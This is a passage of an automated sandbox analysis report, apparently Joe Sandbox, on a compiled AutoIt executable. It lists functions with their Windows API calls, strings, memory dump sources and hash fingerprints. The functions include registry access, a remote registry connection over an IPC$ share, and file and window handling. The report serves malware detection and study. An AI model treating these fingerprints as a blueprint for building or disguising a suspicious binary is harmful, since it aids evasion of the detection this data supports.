                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DCA42C
                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DCA444
                              • Part of subcall function 00D425DB: GetWindowLongW.USER32(?,000000EB), ref: 00D425EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                            • String ID: 0$tooltips_class32
                            • API String ID: 1297703922-3619404913
                            • Opcode ID: 4492159b25ea187173c45c0a948be8388cb2637dc2b4236c7fb0edfec4b0b7b3
                            • Instruction ID: 8da872f8e637af720eb3ad36b55860d6d49ec554f541ba136f55aa8cd3590cd9
                            • Opcode Fuzzy Hash: 4492159b25ea187173c45c0a948be8388cb2637dc2b4236c7fb0edfec4b0b7b3
                            • Instruction Fuzzy Hash: 75716B7114424AAFD725CF28CC49FA677E6FB88304F08452DF985972A0D771E946CB72
                            Function 00DC4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00DC4424
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DC446F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                            • API String ID: 3974292440-4258414348
                            • Opcode ID: ba1bd5fa96f067275e27c6546e28ea648e39fda89977a0209b2cee6b6438eee1
                            • Instruction ID: 601634603008ca3918f63593fbfad850f9600df5d8219a8319f927bc498476ed
                            • Opcode Fuzzy Hash: ba1bd5fa96f067275e27c6546e28ea648e39fda89977a0209b2cee6b6438eee1
                            • Instruction Fuzzy Hash: A5913A702047029BCB14EF24C461B6EB7A1EF95354F15886DF8965B3A2CB31ED4ACBB1
                            Function 00DCB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadImageW.USER32 ref: 00DCB8B4
                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DC91C2), ref: 00DCB910
                            • LoadImageW.USER32 ref: 00DCB949
                            • LoadImageW.USER32 ref: 00DCB98C
                            • LoadImageW.USER32 ref: 00DCB9C3
                            • FreeLibrary.KERNEL32(?), ref: 00DCB9CF
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DCB9DF
                            • DestroyIcon.USER32(?,?,?,?,?,00DC91C2), ref: 00DCB9EE
                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DCBA0B
                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DCBA17
                              • Part of subcall function 00D62EFD: __wcsicmp_l.LIBCMT ref: 00D62F86
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                            • String ID: .dll$.exe$.icl
                            • API String ID: 1212759294-1154884017
                            • Opcode ID: 80d1e6377e4611e569be31ff2e1991e80cea3ce32f1eab69f67f51331b04a467
                            • Instruction ID: 9c7e2a25867167c1f25395911930370911e378801b14cb4eafcdc38482d35c48
                            • Opcode Fuzzy Hash: 80d1e6377e4611e569be31ff2e1991e80cea3ce32f1eab69f67f51331b04a467
                            • Instruction Fuzzy Hash: A161AC7190061ABBEB14DF64CC82FBA7BA8EB08720F10451AFA15D71D1DB75DA90DBB0
                            Function 00DAA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • CharLowerBuffW.USER32(?,?), ref: 00DAA3CB
                            • GetDriveTypeW.KERNEL32 ref: 00DAA418
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAA460
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAA497
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAA4C5
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 2698844021-4113822522
                            • Opcode ID: 541cc63eaa1bd1eea2d0f831831de7b602d4dddb09d65c24fa030d129932468d
                            • Instruction ID: 09bf142bea2dee284168fa8725fb775a553eef36680c3b86f9dd96f002f30890
                            • Opcode Fuzzy Hash: 541cc63eaa1bd1eea2d0f831831de7b602d4dddb09d65c24fa030d129932468d
                            • Instruction Fuzzy Hash: CC5149711043059FC700EF24C89196AB7E4EF89758F04896DF89A972A2DB71ED0ACF72
                            Function 00D9F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00D7E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00D9F8DF
                            • LoadStringW.USER32(00000000,?,00D7E029,00000001), ref: 00D9F8E8
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • GetModuleHandleW.KERNEL32(00000000,00E05310,?,00000FFF,?,?,00D7E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00D9F90A
                            • LoadStringW.USER32(00000000,?,00D7E029,00000001), ref: 00D9F90D
                            • __swprintf.LIBCMT ref: 00D9F95D
                            • __swprintf.LIBCMT ref: 00D9F96E
                            • _wprintf.LIBCMT ref: 00D9FA17
                            • MessageBoxW.USER32 ref: 00D9FA2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 984253442-2268648507
                            • Opcode ID: a02ee78a37d33d5525e819aa8be8c31470d80b65356c9c2e7b1628f41b43f03d
                            • Instruction ID: 45e9b2ba427bd27e785a1fdbec961c9f3f50678815a17e384ba8064c2b1f6615
                            • Opcode Fuzzy Hash: a02ee78a37d33d5525e819aa8be8c31470d80b65356c9c2e7b1628f41b43f03d
                            • Instruction Fuzzy Hash: 1E410672904209ABCF05FBE0DD86EEEB778EF18300F500165B605B61A2EB356F49CA71
                            Function 00DCBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00DCBA56
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00DC9207,?,?,00000000,?), ref: 00DCBA6D
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00DC9207,?,?,00000000,?), ref: 00DCBA78
                            • CloseHandle.KERNEL32(00000000), ref: 00DCBA85
                            • GlobalLock.KERNEL32(00000000), ref: 00DCBA8E
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DCBA9D
                            • GlobalUnlock.KERNEL32(00000000), ref: 00DCBAA6
                            • CloseHandle.KERNEL32(00000000), ref: 00DCBAAD
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00DCBABE
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DD2CAC,?), ref: 00DCBAD7
                            • GlobalFree.KERNEL32(00000000), ref: 00DCBAE7
                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00DCBB0B
                            • CopyImage.USER32 ref: 00DCBB36
                            • DeleteObject.GDI32(00000000), ref: 00DCBB5E
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DCBB74
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3840717409-0
                            • Opcode ID: 42632bcb87890228c06bda3adaa928e43fff0270ad90eb6ec8ac48199e7202ee
                            • Instruction ID: dc695bcb28cc5c04e83978763c7e8f21c305d7e49bece0bf8d1014442716ddd4
                            • Opcode Fuzzy Hash: 42632bcb87890228c06bda3adaa928e43fff0270ad90eb6ec8ac48199e7202ee
                            • Instruction Fuzzy Hash: 6741367560030AEFDB119FA5DC89EAABBBAEB89721F144069F945D7260C7709D01CB30
                            Function 00DAD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                            Download Yara Rule
                            APIs
                            • __wsplitpath.LIBCMT ref: 00DADA10
                            • _wcscat.LIBCMT ref: 00DADA28
                            • _wcscat.LIBCMT ref: 00DADA3A
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DADA4F
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DADA63
                            • GetFileAttributesW.KERNEL32(?), ref: 00DADA7B
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00DADA95
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DADAA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                            • String ID: *.*
                            • API String ID: 34673085-438819550
                            • Opcode ID: bfee80a80c893979d5ad8310deec1d20200b889058b3c45e98e8d12cab7ee4f5
                            • Instruction ID: 33d1f8aedc0d9765b4de04d45e66114aa36eab29c3b29183004c7258c5ac91f4
                            • Opcode Fuzzy Hash: bfee80a80c893979d5ad8310deec1d20200b889058b3c45e98e8d12cab7ee4f5
                            • Instruction Fuzzy Hash: 80816E715043419FCB64DF64C844AABB7EAEF8A710F18882AF88AC7651E634D945CF72
                            Function 00DCC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • PostMessageW.USER32 ref: 00DCC1FC
                            • GetFocus.USER32(?,?,?,?), ref: 00DCC20C
                            • GetDlgCtrlID.USER32 ref: 00DCC217
                            • _memset.LIBCMT ref: 00DCC342
                            • GetMenuItemInfoW.USER32 ref: 00DCC36D
                            • GetMenuItemCount.USER32(?), ref: 00DCC38D
                            • GetMenuItemID.USER32(?,00000000), ref: 00DCC3A0
                            • GetMenuItemInfoW.USER32 ref: 00DCC3D4
                            • GetMenuItemInfoW.USER32 ref: 00DCC41C
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DCC454
                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00DCC489
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                            • String ID: 0
                            • API String ID: 1296962147-4108050209
                            • Opcode ID: 44672ae47ab834ff7018375edc3f6f69fa7a689c963ce08618d3444edd509393
                            • Instruction ID: 76e498c7fbef3f5f74f626a6306f54595f1f81ee8937e0754767fb26af741cc4
                            • Opcode Fuzzy Hash: 44672ae47ab834ff7018375edc3f6f69fa7a689c963ce08618d3444edd509393
                            • Instruction Fuzzy Hash: 0B818C712183429FD714CF14D894FABBBE9EB88714F04992EFA9997291C730E905CB72
                            Function 00DB731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32(00000000), ref: 00DB738F
                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00DB739B
                            • CreateCompatibleDC.GDI32(?), ref: 00DB73A7
                            • SelectObject.GDI32(00000000,?), ref: 00DB73B4
                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00DB7408
                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00DB7444
                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00DB7468
                            • SelectObject.GDI32(00000006,?), ref: 00DB7470
                            • DeleteObject.GDI32(?), ref: 00DB7479
                            • DeleteDC.GDI32(00000006), ref: 00DB7480
                            • ReleaseDC.USER32(00000000,?), ref: 00DB748B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                            • String ID: (
                            • API String ID: 2598888154-3887548279
                            • Opcode ID: ee53f01b0173c57622c716196f8c81326c534e94707e7fc58118408587e1f0f9
                            • Instruction ID: 8e55e59d1cd71be0f42600fdcad3cc5b7da843dcd4bdea4a5f4c3144329fccf2
                            • Opcode Fuzzy Hash: ee53f01b0173c57622c716196f8c81326c534e94707e7fc58118408587e1f0f9
                            • Instruction Fuzzy Hash: 37513C7590430AEFCB15CFA9CC85EEEBBB9EF48710F148529F99A97311C731A9409B60
                            Function 00D46A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D60957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00D46B0C,?,00008000), ref: 00D60973
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00D46BAD
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D46CFA
                              • Part of subcall function 00D4586D: _wcscpy.LIBCMT ref: 00D458A5
                              • Part of subcall function 00D6363D: _iswctype.LIBCMT ref: 00D63645
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                            • API String ID: 537147316-1018226102
                            • Opcode ID: ae860e9f1408dde03ac494777595aeb1abdc4041a22ace05feac28f4cd11d90e
                            • Instruction ID: 10932bf45e664ad6ab5f80019a4e7b399f885c103e4db68dd043ba83885decf4
                            • Opcode Fuzzy Hash: ae860e9f1408dde03ac494777595aeb1abdc4041a22ace05feac28f4cd11d90e
                            • Instruction Fuzzy Hash: 6C027B715083419FCB14EF24C881AAFBBE5EF99314F14491DF49A972A2EB30D949CB72
                            Function 00DA2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                            • String ID:
                            • API String ID: 3993528054-0
                            • Opcode ID: 8ced27616811dc651e74f5a9ec9dbb25e04479a76946bc9be72591256dc32384
                            • Instruction ID: 371f30247aaa3f6fc481e741e469b06abaa3498552226e49d3f0db405aaa8c42
                            • Opcode Fuzzy Hash: 8ced27616811dc651e74f5a9ec9dbb25e04479a76946bc9be72591256dc32384
                            • Instruction Fuzzy Hash: 2171F370640206BEEB218F5ADC85FBABF65FF06324F140216F615A61E1C7719C60DBB1
                            Function 00D977DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • _memset.LIBCMT ref: 00D9786B
                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D978A0
                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D978BC
                            • RegOpenKeyExW.ADVAPI32 ref: 00D978D8
                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00D97902
                            • CLSIDFromString.OLE32(?,?), ref: 00D9792A
                            • RegCloseKey.ADVAPI32(?), ref: 00D97935
                            • RegCloseKey.ADVAPI32(?), ref: 00D9793A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                            • API String ID: 1411258926-22481851
                            • Opcode ID: 4c726430489a7ffed27e9dfb20c113b4792f7974514bac0c81dfaa75e43a999a
                            • Instruction ID: 3a8432b23984e473e19c31bcca9342cea02d28521d233298459f8ce84d2c0f22
                            • Opcode Fuzzy Hash: 4c726430489a7ffed27e9dfb20c113b4792f7974514bac0c81dfaa75e43a999a
                            • Instruction Fuzzy Hash: 3D41D472C24629ABCF11EBA4DC85EEDB779FF04750B454169E905A2261EB305E08CAB0
                            Function 00DC0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00DC0E31
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                            • API String ID: 3964851224-909552448
                            • Opcode ID: 2001b579bd30575df746f74370caaae45c1e79b3cba82b665ad20d1b2f3a0460
                            • Instruction ID: 1693abbeedc7157d1c518821dafd199b5f208fb724efbd0ff3da2fbfce3b7bc2
                            • Opcode Fuzzy Hash: 2001b579bd30575df746f74370caaae45c1e79b3cba82b665ad20d1b2f3a0460
                            • Instruction Fuzzy Hash: 6A41583154024ACBCF10EF50D865BEF3B64EF21344F594528FD951B2A2DB30A99ACBB0
                            Function 00D9F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D7E2A0,00000010,?,Bad directive syntax error,00DCF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00D9F7C2
                            • LoadStringW.USER32(00000000,?,00D7E2A0,00000010), ref: 00D9F7C9
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • _wprintf.LIBCMT ref: 00D9F7FC
                            • __swprintf.LIBCMT ref: 00D9F81E
                            • MessageBoxW.USER32 ref: 00D9F88D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            • API String ID: 1506413516-4153970271
                            • Opcode ID: caa711ada5a1c798bb9b0a8201b9c6f8136dc64ed74cc16e81575b16ea2a5152
                            • Instruction ID: c07044eecadd40090f18ca2e6d3e607a20c910d2d3a53682b4c7961bc49747c5
